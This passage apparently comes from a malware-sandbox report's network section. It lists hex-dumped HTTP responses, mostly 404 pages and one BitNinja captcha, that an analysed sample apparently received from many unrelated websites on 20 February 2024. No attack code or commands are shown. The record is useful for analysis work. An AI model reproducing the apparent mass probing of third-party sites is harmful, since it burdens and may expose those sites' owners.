73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=15Date: Tue, 20 Feb 2024 23:26:12 GMTServer: ApacheX-Powered-By: PHP/7.3.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://www.netzschnipsel.de/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 32 35 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d df 72 db b8 92 f7 75 5c 75 de 01 66 76 23 69 47 a4 44 49 fe 27 5b 9e e3 c4 4e c6 33 71 92 cf 72 36 7b 36 49 b9 28 09 92 18 53 a4 86 a4 2c 3b 99 bc c9 56 ed cd 79 86 bd 9a bb bc d8 fe 1a 00 ff 49 b4 4c 39 39 5f 6d 6d 6d 52 b6 25 12 40 37 1a dd 8d 46 77 03 38 d8 3c 7e fd ec e2 6f 6f 4e d8 38 9c 38 87 1b 07 f4 87 f5 1d 2b 08 3a 9a eb e9 9f 02 8d 39 96 3b ea 68 03 ae 1f 9f 68 ec 66 e2 b8 41 7b d8 eb 68 e3 30 9c b6 6b 35 6f 34 35 26 bc e6 06 b5 61 ef 71 f4 de 1a 0c c2 b1 8d 26 54 a1 f9 7c 6e a8 67 46 df 9b d4 c6 dc 99 d6 ac a9 ad 07 53 de d7 18 c1 e5 d6 e0 70 83 b1 83 09 0f 2d d6 1f 5b 7e c0 c3 8e f6 f6 e2 b9 be ab 25 2f 5c 6b c2 3b da b5 cd e7 53 cf 0f 35 d6 f7 dc 90 bb 28 38 b7 01 b1 33 e0 d7 76 9f eb e2 4b 95 d9 ae 1d da 96 a3 07 7d cb e1 1d d3 a8 cb 86 1c db bd 62 3e 77 3a da d4 f7 86 b6 c3 35 36 f6 f9 30 46 76 34 99 8e 0c cf 1f d5 6e 86 6e cd 34 97 2a d9 ee a8 67 f5 af 16 6a 51 17 5d 1e 7e 0e fa 63 d7 9e 06 dc 31 06 bc 06 6a f9 d3 be 31 1d 4f d1 0a f5 2e b4 43 87 1f 76 b9 1d 72 e6 da fd 71 c8 46 7c 38 73 07 dc 65 4f 1e ef 36 4c 73 9f bd 4a 37 c2 06 dc 67 5d af 8f 6e b0 33 3e b0 2d f6 d4 f1 46 07 35 d9 ce c6 41 d0 f7 ed 69 78 38 f0 fa b3 09 e8 60 44 1f 4e 1c 2e be 8b 91 7c 05 a2 b1 0e 8b de dd 5d c8 f0 f9 d4 b1 fa bc ac 86 be aa 61 fc 2b fb 07 35 05 66 e3 20 a6 5d 69 e0 06 fa 14 64 e3 61 7f 5c 92 04 2c d5 6a 79 54 28 b1 1a 06 f8 be 9a 81 31 27 a2 2f 14 d6 2c 27 e4 be 6b 85 18 a4 f0 76 8a b1 b7 a6 53 c7 ee 5b a1 ed b9 35 3f 08 7e 02 89 f1 8a c8 da d1 0a 90 8e 3d f1 ad df 67 de 3e 7b ce f9 a0 c8 10 0e 51 ae a6 65 bb f0 8f c3 ea 37 6f 42 e3 66 f9 7a 51 fc 20 4e 54 03 e2 17 23 fa e8 91 e2 0b 45 b2 90 df 84 b5 4f d6 b5 25 87 11 ac f8 e8 d1 a3 b9 ed 0e bc b9 71 39 9f f2 89 f7 c9 ee f2 30 04 63 07 e0 93 2f 5a cf 0a f8 5b df d1 da 42 7e 83 f6 87 da 87 9a 1a 9f 0f 35 7b 62 8d 78 f0 a1 d6 f7 7c fe a1 26 2a 7f a8 35 8c 86 61 7e a8 ed 34 6e 76 1a 1f 6a 5a 55 03 48 54 37 a6 ee 08 5f 82 eb d1 83 9a 43 3d d1 18 fe 9e c8 f6 f0 89 da f3 66 7e 9f 6b ed 2f 1a e4 1f bc 20 90 50 d8 0a 64 f3 d8 f0 43 6d 3e d5 6d b7 ef cc 06 84 fe 27 fc e0 81 a8 aa 43 1b 70 f4 d9 98 d8 ae f1 29 f8 f9 9a fb 9d 96 b1 63 34 76 b5 af 5f f7 89 5a 9b 10 d2 3e f1 5c 39 ac 5a 55 5e f9 72 6d f9 cc af ba 55 bb ea 75 2c a3 ef 73 60 a1 84 ae ac f5 2d 17 c4 d6 2a 55 a7 e3 19 23 1e 3e 23 2d 75 13 3e 79 92 fe 56 d6 1a 03 08 57 d4 30 eb 97 43 d9 2c 5f 6e 50 0d 5c 65 9f 1b 81 df ef 84 55 0e ed 32 04 96 dc 90 52 b1 38 c4 55 8b e0 2a 84 82 a7 b7 17 d6 88 b4 40 59 23 3d ab 55 de d7 3f 1a 10 24 ee 0e 9e 8d 6d 67 50 e6 95 af 43 cf 2f db 9d 23 df
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:12 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:12 GMTServer: ApacheContent-Length: 268Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:12 GMTServer: ApacheLast-Modified: Wed, 21 Mar 2018 06:16:02 GMTETag: "696-567e62015ec80"Accept-Ranges: bytesContent-Length: 1686Content-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 35 78 78 20 7b 20 62 61 63 6b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:12 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-66.ec2.internalX-Request-Id: 2e847978-13e7-4b5c-a895-a7305c309e1dData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:13 GMTServer: nginx/1.21.6Content-Type: text/html; charset=UTF-8Content-Length: 7939Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wilsonfamilyinsurance.com/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Set-Cookie: PHPSESSID=778830249bd0e779849921820b42fe98; path=/Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 72 6b 73 db b6 d6 f5 e7 78 a6 ff 01 66 a6 b1 d4 0a a4 6e be c9 a6 fb e4 a4 c9 79 72 a6 a7 e9 d3 a4 d3 f7 4c 92 c9 40 e4 26 09 1b 04 58 00 d4 a5 ae ff fb bb 41 5d 2c cb 94 ec c4 4e 8f e2 48 24 b0 f7 5a 6b af bd be d9 f9 66 e7 74 f7 c7 37 2f de fd e7 97 97 24 b3 b9 38 c3 03 f7 4b 04 93 69 e8 81 a4 bf bd f5 aa 43 60 b1 fb cd c1 32 12 65 4c 1b b0 a1 f7 db bb 57 f4 c8 23 c1 f2 26 b3 b6 a0 f0 47 c9 47 a1 f7 ff e8 6f cf e9 0b 95 17 cc f2 a1 00 8f 44 4a 5a 90 d8 f6 fa 65 08 71 0a de b2 4d b2 1c 42 6f c4 61 5c 28 6d 57 2a c7 3c b6 59 18 c3 88 47 40 ab 97 16 e1 92 5b ce 04 35 11 13 10 76 bc 33 f2 0d ce 41 c8 a9 e5 56 c0 d9 2f 2c 05 22 95 25 89 2a 65 4c 9e 3d 3d ea 76 3a 27 e4 77 2e 8c 92 e4 15 cb b9 98 92 d7 d2 94 9a c9 08 4e 83 59 d7 aa 90 3d ad 86 ca 9a bd a5 8c bd 9c 4d 28 cf 11 98 16 1a 9c cc 81 60 3a 85 3d 9c 7c e7 54 70 79 41 34 88 70 2f 96 c6 15 24 60 a3 6c 8f 64 f8 14 ee 05 81 b1 cc 1a 7f 5c f8 91 ca ef d7 91 20 af f1 53 a5 52 01 ac e0 e6 fe 9d a3 b6 3f 56 3a c6 0b f3 19 5d bc 5d 2f cf 63 c2 82 96 cc e2 f2 ec b4 c0 15 b1 a2 10 3c c2 85 2a 19 68 63 be 9f e4 02 af 9c 83 a1 b7 c1 61 f2 4c b3 3f 4a 75 42 5e 01 c4 de 8c d3 73 39 31 83 20 18 57 3d 49 d5 c2 17 1d 4e 49 90 60 75 e0 7d 4d 3d 18 cd 1c b7 6b 3e 53 58 34 6f 5b 51 f8 e4 c9 e9 2e a5 e4 5d c6 0d 31 dc 02 29 0d 18 62 33 20 ff ac 76 48 9e 4b 26 a6 96 47 86 0c a7 e4 df 4a 1a 1c 03 05 f1 34 43 fa 42 94 29 97 64 74 e4 77 fb 7e 9b 50 f2 9b e1 32 5d e9 b1 9a 45 17 ee 88 92 a5 bc f1 d8 cf 67 38 7c 8e 53 89 23 94 2e e5 fc ac 2c 0c 6e b1 a1 44 a9 2c 89 4a ad 71 0a 34 06 43 9e f0 b4 d4 10 13 74 cb 2e 66 f0 71 1c 98 4d a3 c6 12 34 91 38 2e 6a 51 84 95 38 99 b4 ce 76 20 63 6e b3 db 53 72 59 4d bf ce 6d c0 5a 9c 03 47 66 12 84 3f 17 fb 64 a9 f7 7a d2 48 c5 e0 ca 97 25 55 45 70 2f 3f e7 16 98 48 f3 c2 ce 73 62 61 62 83 73 36 62 b3 53 ef 6c 27 f8 8e 9c ee be 7f f1 e3 f3 77 cf df 93 ef 82 9d 31 97 b1 1a fb 9f c6 05 e4 ea 9c bf 5d 48 0d c9 a5 37 64 06 7e d3 c2 1b cc e3 f1 21 f8 10 18 7f ec 2b 9d 7e 08 78 ce 52 30 1f 30 17 1a 3e 04 55 f3 87 a0 83 9b f4 db 1f 82 c3 ee e4 b0 fb 21 f0 5a 1e 0a c0 7e bf 90 29 be 98 51 fa 65 78 d8 58 a1 e1 ef cb 19 20 3e b9 77 55 ea 08 bc c1 a5 87 eb 74 8b 71 6d 73 fc 0a 7e 63 9e f1 aa a0 5c 46 a2 8c 1d eb b9 a9 0e aa 7e aa 41 00 8e ee e7 5c fa e7 e6 87 11 e8 f0 c0 ef fb Data Ascii: rksxfnyrL@&XA],NH$Zkft7/$8KiC`2eLW#&GGo
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:13 GMTServer: ApacheContent-Length: 268Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:13 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:13 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Tue, 20 Feb 2024 23:26:13 GMTContent-Length: 45173Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 56 69 73 69 74 6f 72 20 61 6e 74 69 2d 72 6f 62 6f 74 20 76 61 6c 69 64 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 0a 20 20 20 20 20 20 62 6f 64 79 2c 0a 20 20 20 20 20 20 64 69 76 2c 0a 20 20 20 20 20 20 73 70 61 6e 2c 0a 20 20 20 20 20 20 61 70 70 6c 65 74 2c 0a 20 20 20 20 20 20 6f 62 6a 65 63 74 2c 0a 20 20 20 20 20 20 69 66 72 61 6d 65 2c 0a 20 20 20 20 20 20 68 31 2c 0a 20 20 20 20 20 20 68 32 2c 0a 20 20 20 20 20 20 68 33 2c 0a 20 20 20 20 20 20 68 34 2c 0a 20 20 20 20 20 20 68 35 2c 0a 20 20 20 20 20 20 68 36 2c 0a 20 20 20 20 20 20 70 2c 0a 20 20 20 20 20 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 0a 20 20 20 20 20 20 70 72 65 2c 0a 20 20 20 20 20 20 61 2c 0a 20 20 20 20 20 20 61 62 62 72 2c 0a 20 20 20 20 20 20 61 63 72 6f 6e 79 6d 2c 0a 20 20 20 20 20 20 61 64 64 72 65 73 73 2c 0a 20 20 20 20 20 20 62 69 67 2c 0a 20 20 20 20 20 20 63 69 74 65 2c 0a 20 20 20 20 20 20 63 6f 64 65 2c 0a 20 20 20 20 20 20 64 65 6c 2c 0a 20 20 20 20 20 20 64 66 6e 2c 0a 20 20 20 20 20 20 65 6d 2c 0a 20 20 20 20 20 20 69 6d 67 2c 0a 20 20 20 20 20 20 69 6e 73 2c 0a 20 20 20 20 20 20 6b 62 64 2c 0a 20 20 20 20 20 20 71 2c 0a 20 20 20 20 20 20 73 2c 0a 20 20 20 20 20 20 73 61 6d 70 2c 0a 20 20 20 20 20 20 73 6d 61 6c 6c 2c 0a 20 20 20 20 20 20 73 74 72 69 6b 65 2c 0a 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-167.ec2.internalX-Request-Id: 34bc903a-17a7-4ebc-8ccc-48a2ff1b9659Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
